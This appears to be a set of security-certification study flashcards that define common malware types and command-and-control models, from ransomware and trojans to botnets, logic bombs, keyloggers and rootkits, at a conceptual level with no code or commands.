1.2 Given a scenario, analyze potential indicators to determine the type of attack. Flashcards
Malware
software that is specifically designed to disrupt, damage, or gain unauthorized access to a computer system.
Ransomware
A cryptoviral Malware that threatens to publish the victim’s personal data or perpetually block access to it unless an amount of currency is paid. While some simple versions may lock the system without damaging any files, more advanced malware uses a technique called cryptoviral extortion. It encrypts the victim’s files, making them inaccessible, and demands a payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem – and difficult to trace digital currencies such as paysafecard or Bitcoin and other cryptocurrencies are used for the payments, making tracing and prosecuting the perpetrators difficult. Payment doesn’t guarantee a full return of the data, or prevent the threat actor from releasing the data harvested on dark web.
Trojan Horse and Remote Access Trojan (RAT)
malware that is a file, program, or piece of code that appears to be legitimate and safe, but is actually malware. Usually are packaged and delivered inside legitimate software, and they’re often designed to spy on victims or steal data. Usually also downloads additional malware after you install them. A more advanced version give the attack remote access the the infected host.
Potentially unwanted programs (PUPs)
A program that may be unwanted, despite the possibility that users consented to download it. Includes spyware, adware and dialers, bloatware, and are often downloaded in conjunction with a program that the user wants.
Fileless Malware
A type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack. Unlike traditional malware, this malware does not require an attacker to install any code on a target’s system, making it hard to detect.
- A stealth attack. Does a good job of avoiding anti-virus detection.
- Operates in RAM, and never installs in a file or application.
Command and control
A computer controlled by an attacker or cybercriminal which is used to send commands to systems compromised by malware and receive stolen data from a target network.
Also can serves as the headquarters for compromised machines in a botnet. It can be used to disseminate commands that can steal data, spread malware, disrupt web services, and more. systems used by botnets may follow any of these three models: the centralized model, the peer-to-peer [P2P] model, and the random model.
Command and Control: Cenralized
Functions much like the traditional client-server relationship. A malware “client” will phone home and check for instructions. In practice, an attacker’s server-side infrastructure is often far more complex than a single server and may include redirectors, load balancers, and defense measures to detect security researchers and law enforcement. Public cloud services and Content Delivery Networks (CDNs) are frequently used to host or mask activity. It’s also common for hackers to compromise legitimate websites and use them to host command and control servers without the owner’s knowledge.
Command and Control: Peer-To-Peer
command and control instructions are delivered in a decentralized fashion, with members of a botnet relaying messages between one another. Some of the bots may still function as servers, but there is no central or “master” node. This makes it far more difficult to disrupt than a centralized model but can also make it more difficult for the attacker to issue instructions to the entire botnet. P2P networks are sometimes used as a fallback mechanism in case the primary C2 channel is disrupted.
Command and Control: Out of Band and Random
A number of unusual techniques have been observed for issuing instructions to infected hosts. Hackers have made extensive use of social media platforms as unconventional C2 platforms because they are rarely blocked. A project called Twittor aims to provide a fully functional command and control platform using only direct messages on Twitter. Hackers have also been observed using Gmail, IRC chat rooms, and even Pinterest to issue C&C messages to compromised hosts. It’s also been theorized that command and control infrastructure could be entirely random, with an attacker scanning large swaths of the Internet in hopes of finding an infected host.
Bots and Botnet
self-propagating malware that infects its host and connects back to a central server(s). The server functions as a “command and control center”, or a network of compromised computers and similar devices. Malicious Host have the “worm-like ability to self-propagate,” and can also:
Gather passwords Log keystrokes Obtain financial information Relay spam Capture and analyze packets Launch DoS attacks Open back doors on the infected computer Exploit back doors opened by viruses and worms
usually used to infect large numbers of computers in order to create a larger network of infected hosts.
CryptoMalware
a type of malware that allows threat actors to use someone else’s computer or server to mine for cryptocurrencies.
Logic Bomb
is a piece of code intentionally inserted into a software system that will set off a malicious function when specified conditions are met. For example, a programmer may hide a piece of code that starts deleting files, should they ever be terminated from the company.
Spyware
is software with malicious behavior that aims to covertly gather information about a person or organization and send it to another entity in a way that harms the user. For example, by violating their privacy or endangering their device’s security.
Keyloggers
a computer program that records every keystroke made by a computer user, especially in order to gain fraudulent access to passwords and other confidential information.
Rootkit
is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software